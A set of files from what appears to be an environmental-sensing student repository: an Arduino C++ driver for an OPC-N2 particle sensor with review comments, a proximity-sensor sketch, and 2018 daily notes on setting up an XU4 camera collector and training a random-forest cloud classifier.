  printBytesRead(&initial, dataIn, size);   // BUG FIX: parameter is byte[], pass address
  digitalPotStatus dataOutput;
  // BUG FIX: copy only the payload bytes; sizeof(dataOutput) includes the
  // valid flag and would read past the end of dataIn.
  memcpy(&dataOutput, dataIn, size);
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args
  Serial.print("Validity: ");
  Serial.println(dataOutput.valid);
  Serial.print(dataOutput.fanOn); Serial.print(" ");
  Serial.print(dataOutput.laserOn); Serial.print(" ");
  Serial.print(dataOutput.fanDACVal ); Serial.print(" ");
  Serial.print(dataOutput.laserDACVal); Serial.print(" ");
  printMintsEnd();
  delay(1000);
  return dataOutput;
}
// Read the 60-character information string from the sensor.
struct informationString OPCN2NanoMints::readInformationString() {
  printMintsBegin();
  Serial.println("Reading information String");
  int size = 60;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X3F;
  beginTransfer();
  initial = SPI.transfer(inputByte);
  delayMicroseconds(9990);   // allow the sensor to stage the payload
  for (int i = 0; i < size; i++)
  {
    delayMicroseconds(10);
    dataIn[i] = SPI.transfer(inputByte);
  }
  endTransfer();
  printBytesRead(&initial, dataIn, size);   // BUG FIX: parameter is byte[], pass address
  // Assemble the raw payload bytes into a printable String.
  String info = "";
  for (int i = 0; i < size; i++){
    info += String((char)dataIn[i]);
  }
  informationString dataOutput;
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args
  dataOutput.information = info;
  Serial.print("Validity: ");
  Serial.print(dataOutput.valid) ; Serial.println(" ");
  Serial.print(dataOutput.information); Serial.print(" ");
  printMintsEnd();
  delay(1000);
  return dataOutput;
}
// Read the 60-character serial-number string from the sensor.
struct serialNumber OPCN2NanoMints::readSerialNumber() {
  printMintsBegin();
  Serial.println("Reading Serial Number");
  int size = 60;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X10;
  beginTransfer();
  initial = SPI.transfer(inputByte);
  delayMicroseconds(9990);   // allow the sensor to stage the payload
  for (int i = 0; i < size; i++)
  {
    delayMicroseconds(10);
    dataIn[i] = SPI.transfer(inputByte);
  }
  endTransfer();
  printBytesRead(&initial, dataIn, size);   // BUG FIX: parameter is byte[], pass address
  // Assemble the raw payload bytes into a printable String.
  String info = "";
  for (int i = 0; i < size; i++){
    info += String((char)dataIn[i]);
  }
  serialNumber dataOutput;
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args
  dataOutput.serial = info;
  Serial.print("Validity: ");
  Serial.print(dataOutput.valid) ; Serial.println(" ");
  Serial.print(dataOutput.serial); Serial.print(" ");
  printMintsEnd();
  delay(1000);
  return dataOutput;
}
// Read the firmware version (2-byte response: major, minor).
struct firmwareVersion OPCN2NanoMints::readFirmwareVersion() {
  printMintsBegin();
  Serial.println("Reading Firmware Version ");
  int size = 2;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X12;
  beginTransfer();
  initial = SPI.transfer(inputByte);
  delayMicroseconds(9990);   // allow the sensor to stage the payload
  for (int i = 0; i < size; i++)
  {
    delayMicroseconds(10);
    dataIn[i] = SPI.transfer(inputByte);
  }
  endTransfer();
  printBytesRead(&initial, dataIn, size);   // BUG FIX: parameter is byte[], pass address
  firmwareVersion dataOutput;
  // BUG FIX: copy only the payload bytes; sizeof(dataOutput) includes the
  // valid flag and would read past the end of dataIn.
  memcpy(&dataOutput, dataIn, size);
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args
  Serial.print("Validity: ");
  Serial.print(dataOutput.valid) ; Serial.println(" ");
  Serial.print(dataOutput.major); Serial.print(" ");
  Serial.print(dataOutput.minor); Serial.print(" ");
  printMintsEnd();
  delay(1000);
  return dataOutput;
}
void OPCN2NanoMints::readConfigurationVariables() {
printMintsBegin();
Serial.println("Reading Configeration Varibles ");
int size = 256;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X3C;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
//
// configurationVariables dataOutput;
// memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
// dataOutput.valid = comparator(validator, initial,1);
//
// Serial.print("Validity: ");
// Serial.println(dataOutput.valid);
// Serial.println("Bin Boundries");
// Serial.print(dataOutput.binBoundries0);Serial.print(" ");
// Serial.print(dataOutput.binBoundries1);Serial.print(" ");
// Serial.print(dataOutput.binBoundries2);Serial.print(" ");
// Serial.print(dataOutput.binBoundries3);Serial.print(" ");
// Serial.print(dataOutput.binBoundries4);Serial.print(" ");
// Serial.print(dataOutput.binBoundries5);Serial.print(" ");
// Serial.print(dataOutput.binBoundries6);Serial.print(" ");
// Serial.print(dataOutput.binBoundries7);Serial.print(" ");
// Serial.print(dataOutput.binBoundries8);Serial.print(" ");
// Serial.print(dataOutput.binBoundries9);Serial.println(" ");
// Serial.print(dataOutput.binBoundries10);Serial.print(" ");
// Serial.print(dataOutput.binBoundries11);Serial.print(" ");
// Serial.print(dataOutput.binBoundries12);Serial.print(" ");
// Serial.print(dataOutput.binBoundries13);Serial.print(" ");
// Serial.print(dataOutput.binBoundries14);Serial.print(" ");
//
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Boundries Spare");
// Serial.print(dataOutput.binBoundriesSpare);Serial.print(" ");
//
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Particle Volumes");
// Serial.print(dataOutput.binParticleVolume0);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume1);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume2);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume3);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume4);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume5);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume6);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume7);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume8);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume9);Serial.println(" ");
// Serial.print(dataOutput.binParticleVolume10);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume11);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume12);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume13);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume14);Serial.print(" ");
// Serial.print(dataOutput.binParticleVolume15);Serial.print(" ");
// Serial.println("");
//
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Particle Densities");
// Serial.print(dataOutput.binParticleDensity0);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity1);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity2);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity3);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity4);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity5);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity6);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity7);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity8);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity9);Serial.println(" ");
// Serial.print(dataOutput.binParticleDensity10);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity11);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity12);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity13);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity14);Serial.print(" ");
// Serial.print(dataOutput.binParticleDensity15);Serial.print(" ");
//
//
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Bin Sample Volume Weights ");
// Serial.print(dataOutput.binSampleVolumeWeight0);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight1);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight2);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight3);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight4);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight5);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight6);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight7);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight8);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight9);Serial.println(" ");
// Serial.print(dataOutput.binSampleVolumeWeight10);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight11);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight12);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight13);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight14);Serial.print(" ");
// Serial.print(dataOutput.binSampleVolumeWeight15);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Gain Scaling Coefficient");
// Serial.print(dataOutput.gainScalingCoefficient);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Sample Flow Rate");
// Serial.print(dataOutput.sampleFlowRate);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Laser DAC Val");
// Serial.print(dataOutput.laserDACVal);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Fan DAC Val");
// Serial.print(dataOutput.fanDACVal);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("Time of Flight to Sample Flow Rate conversion factor");
// Serial.print(dataOutput.tofToSfrFactor);Serial.print(" ");
//
// printMintsEnd();
delay(1000);
// return dataOutput;
}
void OPCN2NanoMints::readConfigurationVariables2() {
printMintsBegin();
Serial.println("Reading Configeration Varibles 2");
int size = 9;
byte validator = 0XF3;
byte initial ;
byte dataIn[size];
byte inputByte = 0X3D;
beginTransfer();
initial = SPI.transfer(inputByte);
delayMicroseconds(9990);
for (int i = 0 ; i<size; i++)
{
delayMicroseconds(10);
dataIn[i] = SPI.transfer(inputByte);
}
endTransfer();
printBytesRead(initial,dataIn,size);
// configurationVariables2 dataOutput;
// memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
// dataOutput.valid = comparator(validator, initial,1);
//
// Serial.print("Validity: ");
// Serial.println(dataOutput.valid);
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Sampling Interval Count");
// Serial.print(dataOutput.AMSamplingIntervalCount);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Idle Interval Count");
// Serial.print(dataOutput.AMIdleIntervalCount);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Fan On In Idle");
// Serial.print(dataOutput.AMFanOnInIdle);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Laser On In Idle");
// Serial.print(dataOutput.AMLaserOnInIdle);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Max Data Arrays InFile");
// Serial.print(dataOutput.AMMaxDataArraysInFile);Serial.print(" ");
// Serial.println("");
// Serial.println("-------------------------------------------------");
// Serial.println("AM Only Save PM Data");
// Serial.print(dataOutput.AMOnlySavePMData);Serial.print(" ");
//
// printMintsEnd();
delay(1000);
// return dataOutput;
}
// Read one 62-byte histogram frame: 16 bin counts, time-to-cross values,
// flow rate, temperature/pressure, sampling period, checksum and PM values.
// Serial logging is intentionally absent here — this runs on every sample.
// The commented-out debug dump has been removed.
struct histogramData OPCN2NanoMints::readHistogramData() {
  int size = 62;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X30;
  beginTransfer();
  initial = SPI.transfer(inputByte);
  delayMicroseconds(9990);   // allow the sensor to stage the payload
  for (int i = 0; i < size; i++)
  {
    delayMicroseconds(10);
    dataIn[i] = SPI.transfer(inputByte);
  }
  endTransfer();
  histogramData dataOutput;
  // NOTE(review): sizeof(dataOutput) exceeds the 62 payload bytes (struct
  // padding plus the valid flag), so this memcpy reads a few bytes past
  // dataIn, and alignment padding before pm1 may skew the trailing float
  // fields — verify the struct layout against the OPC-N2 data sheet.
  memcpy(&dataOutput, &dataIn, sizeof(dataOutput));
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args, not scalars
  return dataOutput;
}
// Read the 12-byte PM (particulate matter) packet from the OPC-N2 over
// SPI and echo the decoded values to the serial console.
//
// Sends command byte 0x32, waits ~10 ms, then clocks out `size` payload
// bytes 10 us apart (per the Alphasense OPC-N2 SPI protocol). The raw
// bytes are overlaid onto pmData, which must be packed to match the wire
// layout (three little-endian floats: pm1, pm2.5, pm10) -- TODO confirm
// against the struct declaration.
//
// Returns: populated pmData; .valid reflects whether the device
// acknowledged the command with the expected busy byte (0xF3).
struct pmData OPCN2NanoMints::readPMData() {
  printMintsBegin();
  Serial.println("Reading Pm Data");
  int size = 12;             // OPC-N2 PM payload length in bytes
  byte validator = 0XF3;     // expected "command accepted" reply byte
  byte initial ;
  byte dataIn[size];
  byte inputByte = 0X32;     // OPC-N2 "read PM data" command
  beginTransfer();
  initial = SPI.transfer(inputByte);
  delayMicroseconds(9990);
  for (int i = 0 ; i<size; i++)
  {
    delayMicroseconds(10);
    dataIn[i] = SPI.transfer(inputByte);
  }
  endTransfer();
  // NOTE(review): this call relies on a printBytesRead(byte, byte[], int)
  // overload declared elsewhere in this file -- the array variant defined
  // below cannot accept a single byte. Confirm the overload exists.
  printBytesRead(initial,dataIn,size);
  pmData dataOutput;
  // Copy no more than the bytes received and no more than the struct can
  // hold. The previous code copied sizeof(dataOutput) bytes, which reads
  // past the 12-byte dataIn buffer whenever the struct (three floats plus
  // the trailing `valid` flag and padding) is larger than the payload.
  size_t copyLen = sizeof(dataOutput) < (size_t)size ? sizeof(dataOutput) : (size_t)size;
  memcpy(&dataOutput, dataIn, copyLen);
  // NOTE(review): likewise relies on a comparator(byte, byte, int) overload.
  dataOutput.valid = comparator(validator, initial,1);
  Serial.print("Validity: ");
  Serial.println(dataOutput.valid);
  Serial.println("-------------------------------------------------");
  Serial.println("pm1");
  Serial.println(dataOutput.pm1);
  Serial.println("-------------------------------------------------");
  Serial.println("pm2.5");
  Serial.println(dataOutput.pm2_5);
  Serial.println("-------------------------------------------------");
  Serial.println("pm10");
  Serial.println(dataOutput.pm10);
  printMintsEnd();
  return dataOutput;
}
// Compare the first `size` bytes of two buffers.
//
// Params:  arrayOne / arrayTwo -- buffers to compare (each must hold at
//          least `size` bytes); size -- number of leading bytes to check.
// Returns: true when every compared byte matches, false otherwise.
bool OPCN2NanoMints::comparator(byte arrayOne[], byte arrayTwo[], int size)
{
  for (int i = 0; i < size; i++){
    if (arrayOne[i] != arrayTwo[i])
    {
      // Mismatch found -- result is decided, no need to scan the rest
      // (the previous version kept looping over the remaining bytes).
      return false;
    }
  }
  return true;
}
// Assert the OPC-N2 chip-select line (active LOW) to start an SPI
// transaction, then allow 1 ms for the device to become ready before
// any bytes are clocked.
void OPCN2NanoMints::beginTransfer() {
  digitalWrite(alphaSlavePin, LOW);
  delay(1);
}
// End an SPI transaction: wait 1 ms for the last byte to settle, then
// release the OPC-N2 chip-select line (idle HIGH).
void OPCN2NanoMints::endTransfer() {
  delay(1);
  digitalWrite(alphaSlavePin, HIGH);
}
// Debug helper: dump the initial (acknowledge) byte and the received
// payload to the serial console in hex, ten bytes per row.
//
// Params: initial     -- buffer whose first byte is the device's reply
//                        to the command byte;
//         dataIn      -- received payload bytes;
//         sizeOfArray -- number of payload bytes to print.
void OPCN2NanoMints::printBytesRead(byte initial[], byte dataIn[], int sizeOfArray)
{
  Serial.println("--------------------------------");
  Serial.println("Printing Initial Bytes----------");
  Serial.print(initial[0],HEX);
  Serial.print(" ");
  Serial.println("--------------------------------");
  Serial.println("Printing Byte Array-------------");
  for (int idx = 0; idx < sizeOfArray; idx++)
  {
    Serial.print(dataIn[idx],HEX);
    Serial.print(" ");
    // Break the row after every tenth byte to keep the dump readable.
    if ((idx + 1) % 10 == 0)
    {
      Serial.println("");
    }
  }
  Serial.println("");
  Serial.println("--------------------------------");
}
// Print the opening MINTS banner that frames a block of serial output.
void OPCN2NanoMints::printMintsBegin(){
  Serial.println("");
  Serial.println("--------------------------------");
  Serial.println("-------------MINTS--------------");
}
// Print the closing MINTS banner that frames a block of serial output
// (mirror image of printMintsBegin).
void OPCN2NanoMints::printMintsEnd(){
  Serial.println("");
  Serial.println("-------------MINTS--------------");
  Serial.println("--------------------------------");
}
<file_sep>/*
Written by <NAME>
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
int proximity_status = 0;
// One-time initialization: serial console, I2C bus, and the TMG3993
// sensor configured for interrupt-driven proximity sensing.
void setup()
{
  Serial.begin(9600);
  Serial.println("TMG3993 Proximity and RGBC");
  Wire.begin();
  if (sensor.initialize() == false)
  {
    // NOTE(review): execution continues even when initialization fails,
    // so later reads may return garbage -- consider halting here.
    Serial.println("Check Wiring");
  }
  sensor.setupRecommendedConfigForProximity();
  // Power on the device and enable the proximity engine + its interrupt.
  sensor.enableEngines(ENABLE_PON | ENABLE_PEN | ENABLE_PIEN);
}
// Poll the TMG3993 once per millisecond and report proximity state
// transitions (detected/removed) over serial, using proximity_status to
// suppress repeated messages while the state is unchanged.
void loop()
{
  if (sensor.getSTATUS() & STATUS_PVALID)
  {
    int reading = sensor.getProximityRaw();
    if (reading < 50 && proximity_status == 0) {
      // Object just came close: announce once and latch the state.
      Serial.println("Proximity Detected");
      proximity_status = 1;
    } else if (reading > 50 && proximity_status == 1) {
      // Object just moved away: announce once and clear the state.
      Serial.println("Proximity Removed");
      proximity_status = 0;
    }
  }
  delay(1);
}
<file_sep>#ifndef JOBS_MINTS_H
#define JOBS_MINTS_H
#include <Arduino.h>
#include "devicesMints.h"
// Serial/reporting helpers shared by the MINTS sketches.
// Presumably opens the serial port used for sensor output -- see the
// matching definition for the baud rate.
void initializeSerialMints();
// Print a labelled group of readings for one sensor.
// sensor: sensor name/label; readings: formatted values to print;
// numOfvals: number of entries in readings[].
void sensorPrintMints(String sensor,String readings[],uint8_t numOfvals);
// extern bool stringComplete;
// extern String inputString;
// void commandReadMints();
//
// void serialEvent();
#endif
<file_sep># Daily Notes
## 12th of June 2018
### Task 1: Installing an automated image collector using an XU4
The following is a description of the work done for the day.
#### Task 1.1 : Installing linux on an XU4
##### 1.1.1 Downloading the XU4 Image
- Download the linux image for the XU4 through: https://odroid.in/ubuntu_16.04lts/
- A compatible version of our choosing can be used.
eg.: https://odroid.in/ubuntu_16.04lts/ubuntu-16.04-minimal-odroid-xu3-20160706.img.xz <br />
**(Make sure to download a minimal version for the XU4)**
##### 1.1.2 Installing an Image flasher software
- GUI based image flasher software 'etcher' was downloaded via https://etcher.io/
- Once downloaded, extract and run the resulting file.
##### 1.1.3 Flashing an SD Card
- Running the resulting file from the previous task gives a GUI directing on how to flash the sd card.
-- Need to chose the image file and the destination of the SD Card
##### 1.1.4 Installing Screen on Ubuntu
- run the following commands on the linux command window
```
sudo apt-get update
sudo apt-get install screen
```
##### 1.1.5 Setting up the USB-UART Module Kit
- Initially connect the UART through one of the USB ports on the PC.
- Check whether it is properly connected by typing ```lsusb ``` into the command window. The vendor and product keys of the UART will be listed if it is.
- Then type in ```sudo modprobe usbserial vendor=0x1d09 product=0x4000 ```
in this example 1d09 is the vendor key and the product key is 4000. <br />
**Make sure to replace the vendor key and the product key with what you have**
- To figure out which USB port the UART is plugged in, use the command ``` dmesg ```
- Then type in ``` screen /dev/ttyUSB0 115200 ```
- The resulting screen is to be utilized as the main interface for the XU4. <br />
**Helpful Tutorial: https://www.youtube.com/watch?v=HuCh7o7OsGk**
##### 1.1.6 Booting the XU4
- Connect the SD card and the UART to the XU4.
- Connect Power. After the initial process, it will ask for a user name and password. Typically they will be as follows.
-- User Name: odroid
-- Password: <PASSWORD> <br/>
**(In some cases the username will be 'root')**
##### 1.1.7 Updating the XU4
- After logging in, type in ```sudo halt``` and provide the password if needed.
- The interface will let you know once the system is halted. Afterwards, remove power and connect the ethernet cable as well as the webcam.
- Reboot the XU4 by reconnecting power. Log in via the usual manner and update the system by running the following commands.
```
sudo apt-get update # Fetches the list of available updates
sudo apt-get upgrade # Strictly upgrades the current packages
sudo apt-get dist-upgrade # Installs updates (new ones)
````
### Task 2 : Installing other dependancies for the Automated Image Collector
#### 2.1 Installing Git
- run the following commands on the XU4 interface
```
sudo apt-get update
sudo apt-get install git-core
```
- to check the installation you can run ```git --version ```
#### 2.2 Installing fswebcam
- run the following commands on the XU4 interface
```
sudo apt-get update
sudo apt-get install fswebcam
```
### Task 3 :Setting up the Repository and setiing up a Cronjob
within the folder named 'offline image collector'
#### 3.1 Cloning the Git Repository
- Navigate to the home directory of the XU4
- Make a new directory named 'repos' via ``` mkdir repos ```
- Navigate to the cretaed directory via ``` cd repos```
- Clone the GIT Hub Repository via ``` git clone https://github.com/waggle-sensor/summer2018.git```
#### 3.2 Modifying the acquire_image.sh script
- Navigate to the directory where the shell script for the image colloector is placed <br/>
```cd /home/repos/summer2018/wijeratne/codes/offline_image_collector/```
- Make a new folder to store the files ``` mkdir Photos ```within the folder named 'offline image collector'.
- Open the shell script through nano by typing in ``` nano acquire_images.sh ``` again within the folder named 'offline image collector'.
- Replace the whole script by the follwoing code on the file 'acquire_images.sh'
```
#!/bin/sh
fswebcam --png 0 --device /dev/video0 --skip 4 --input 0 --resolution 640x480 --no-banner --save /home/waggle/photos/Cloud_Pic_%Y_%m_%d_%H_%M_%S.png
```
- Save the modified file on the same folder and run the command ``` chmod +x acquire_images.sh``` to have execute permissions for the script.
#### 3.3 Setting up the cronjob
- Type in the follwing code to set up a crontab:
``` crontab -e ```
- Give in the following cronjob in the resulting window: <br/>
``` */5 * * * * cd /home/repos/summer2018/wijeratne/codes/offline_image_collector && ./acquire_image.sh ```
- Finally save the cron job <br/>
**(Check up on the folder named 'photos' every 5 minutes to see if the images are being saved.)** <br/> <br/>
## 14th of June 2018
The follwing tasks are geared towards having XU4 outside so that it will have a collection of photos that will be used to verify the cloud detection script.
### Task 4: Placing the XU4 which is connected to a camera outside.
#### 4.1 Doing a temporory housing for the XU4 and placing it outside
- Use a plastic tool holder to work as the housing.
- Leave a dome which is used in the actual sensor ontop of the camera for consistancy.
- Place the temporary housing outside. Reboot the XU4 and leave it out for a few hours.<br/>
**(Make sure to check the weather before placing it outside)**
#### 4.2 Installing nmap
- run the following commands on the Linux Command Line
```
sudo apt-get update
sudo apt-get install nmap
```
#### 4.3 Finding the ip address of the Desktop
- Type in ```ifconfig``` on the Desktop to figure out the ip address of the current machine. The output will be as follows.
```
eno1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.144 ....
```
The set of numbers infront of the key inet gives the ip of the current machine. In this example the ip of the current machine is '10.10.10.144'. <br />
#### 4.4 Scan the network for the XU4
- Connect the XU4 to the router which the desktop is hooked up.
- On the linux Command line type in ```nmap 192.168.1.0-255 -p 80 ```. This will scope through all the ip addresses connected to the router.``` - p 80 ``` added to avoid listing all ports of a given ip.
- Record the IP address for the XU4
#### 4.5 Connect to the XU4 though SSH
- On the command line of the PC type in ```ssh root@192.168.1.55```
in this example the user name and the password for the XU4 are 'root' and '<PASSWORD>'. <br />
**Make sure to replace the username and the password with what you have** <br />
- type ``` exit``` to come back to the local machine.
#### 4.6 Downloading the folder with the photos from the XU4
- On the command line of the PC type in <br/>
```
scp -r root@192.168.1.55:/home/repos/summer2018/wijeratne/codes/offline_image_collector/photos /home/lakithaomal/repos/summer2018/wijeratne/codes/cloud_detection
```
In this example the XU4 ip address is *192.168.1.55* ,the XU4 Directory is which the files are copied from is */home/repos/summer2018/wijeratne/codes/offline_image_collector/photos* and the XU4 user name is *root*. The desination of the host PC is */home/lakithaomal/repos/summer2018/wijeratne/codes/cloud_detection*. <br />
**Make sure to modify the usernames and the directories with the appropriate credentials**
- Check to see if the files are copied into the local directory.
## 15th of June 2018
The following tasks mark the initiation of the Bike Bottle Sensor Project.
### Task 5 : Documentation of the Bike Bottle Sensor Design
#### 5.1 Doing the Bike Bottle Design Overveiw
- Define the constraints and the necessary objectives of the proposed project<br />
**The link to the said docuement is found [here](https://github.com/waggle-sensor/summer2018/tree/master/wijeratne/codes/bike_bottle_design)**
(Further modifications were made after contatcting Prof. Lary)
The folling tasks are geared towards checking the Accuracy of the Cloud Detection App.
### Task 6 : Verification of the Cloud Detector App
#### 6.1 Getting the Images ready for verification
- For the verification process an ordered set of images are needed. The Images downloaded from the XU4 are named randomly. As such the said images are renamed in an orderly manner using the code given **[here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/cloud_detection/python/Renaming.py)**
- The renamed files contain a timestamp which is displayed on the lower right hand corner of each image. This which will interefear with the prediction. As such the resulting files are croped via the code found **[here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/cloud_detection/python/Image_Cropper.py)**
## 18th - 22nd of June 2018
#### 6.2 Downloading pre classified data for verification
- A data set which is pre classified for the the task at hand can be found [here](http://vintage.winklerbros.net/swimseg.html).
On this link, fill in a seprate form as par a request for the data set featured. Once a request is sent, and email with the data set requested will be sent.
### Task 7 : Writing a separate App to Distinguish between Clouds and Sky pixels
The paper provided in this [link](http://vintage.winklerbros.net/Publications/jstars2017.pdf) gives a distinct way in which the classification can be done. The study is based on a method where each pixel is handled individually contarary to the usual means of image segmentation. The following is a description of the implimentation discussed in the paper.
**The data set provided by the [Singapore Whole sky IMaging SEGmentation Database](http://vintage.winklerbros.net/swimseg.html)
contained 1000 images. Due to resource constraints, the initial study is doen using only 300 images.**
#### 7.1 Training a Random Forest Classifier
The python script written to train a Random Forest Classifier is described here.
- Initially the color spaces are separated for all the images. These color spaces used are listed below.
- RGB Color SPace
- HSV Color Space
- LAB Colour Space
The following scripts were used to gain seprated colour space images:
```
Input_Image_RGB = cv2.cvtColor(Input_Image, cv2.COLOR_BGR2RGBA)
# Gaining HSV Images
Input_Image_HSV = cv2.cvtColor(Input_Image, cv2.COLOR_BGR2HSV)
# Gaining LAB Images
RGB_for_LAB = io.imread(input_path)
Input_Image_LAB = color.rgb2lab(RGB_for_LAB)
```
- These were converted into Arrays using numpy via the script ``` np.array()```. In order to get separate feature vectors for a given pixel each dimention of all color spaces are converted into 1D arrays via these scripts.
```
# Converting Each Image into 1D Vectors
One_D_Image_Red = np.transpose(np.matrix(Image_Array_RGB[:, :, 0].ravel()))
One_D_Image_Green = np.transpose(np.matrix(Image_Array_RGB[:, :, 1].ravel()))
One_D_Image_Blue = np.transpose(np.matrix(Image_Array_RGB[:, :, 2].ravel()))
One_D_Image_H = np.transpose(np.matrix(Image_Array_HSV[:, :, 0].ravel()))
One_D_Image_S = np.transpose(np.matrix(Image_Array_HSV[:, :, 1].ravel()))
One_D_Image_V = np.transpose(np.matrix(Image_Array_HSV[:, :, 2].ravel()))
One_D_Image_L = np.transpose(np.matrix(Image_Array_LAB[:, :, 0].ravel()))
One_D_Image_A = np.transpose(np.matrix(Image_Array_LAB[:, :, 1].ravel()))
One_D_Image_B = np.transpose(np.matrix(Image_Array_LAB[:, :, 2].ravel()))
```
-The final feature vector composed of these inputs as well as the ratio of Red to Blue Pixel values, the difference of Red to blue pixels and two other features which comprised of red and blue colour pixel values.
The follwing code is used to gain the complete feature vector for a given pixel
```
# Writing the full Feature Vector
One_D_Image = np.hstack((One_D_Image_Red, One_D_Image_Green, One_D_Image_Blue,\
One_D_Image_H, One_D_Image_S, One_D_Image_V, \
One_D_Image_L, One_D_Image_A, One_D_Image_B, \
One_D_Image_Red/One_D_Image_Blue, np.subtract(One_D_Image_Red, One_D_Image_Blue), \
(One_D_Image_Blue-One_D_Image_Red)/(One_D_Image_Blue+One_D_Image_Red),\
One_D_Chroma
))
```
**Due to resource constraints a lesser number of features may be used for the final study**
- Using the target images a target feature vector is aquired. The code was designed in a manner where in which each cloud pixel will have a value 1 and each sky pixel will have value 0. The follwing is the script used:
```
# For a Given Image a Target Vector is Generated
Input_Image_Binary = cv2.imread(input_path)
Image_Array_Binary = np.array(Input_Image_Binary)
Image_Shape = Image_Array_Binary.shape
One_D_Binary = np.transpose(np.matrix(Image_Array_Binary[:, :, 1].ravel()))
One_D_Binary = One_D_Binary.astype(float) / 255
```
- Once all feature vectors and target vectors are concatinated, A random Tree Classifier is trained and saved for later use. The implimentation is as follows:
```
# Instantiate model with 10 decision trees
Random_Forest_Model = RandomForestRegressor(n_estimators=10, random_state=42)
# Train the model on training data
Random_Forest_Model.fit(All_Features_Training, np.ravel(All_Targets_Training, order='C'))
# Saving the Model
Model_Save_File_Name = 'Cloud_App_Via_Sklearn_Model.sav'
pickle.dump(Random_Forest_Model, open(Model_Save_File_Name, 'wb'))
```
#### 7.2 Verification of the Random Forest Classifier
- On the previous step the around 300 images provided were divided into training and testing sets using
```Train_Index, Test_Index = train_test_split((Indexes), test_size = 0.3, random_state = 42) ```
For this study the testing data set contained around 30% percent of the total data set.
- On this module initially the trained Random Forest Classifier is loaded via
```
Model_Save_File_Name = 'Cloud_App_Via_Sklearn_Model.sav'
loaded_Random_Tree = pickle.load(open(Model_Save_File_Name, 'rb'))
```
- Following is a description of the Feature Vectors and Target Vectors gained within the script:
-- Each pixel of the Training data set images are saved as ```All_Features_Training```
-- Each pixel of the Testing data set images are saved as ```All_Features_Testing```
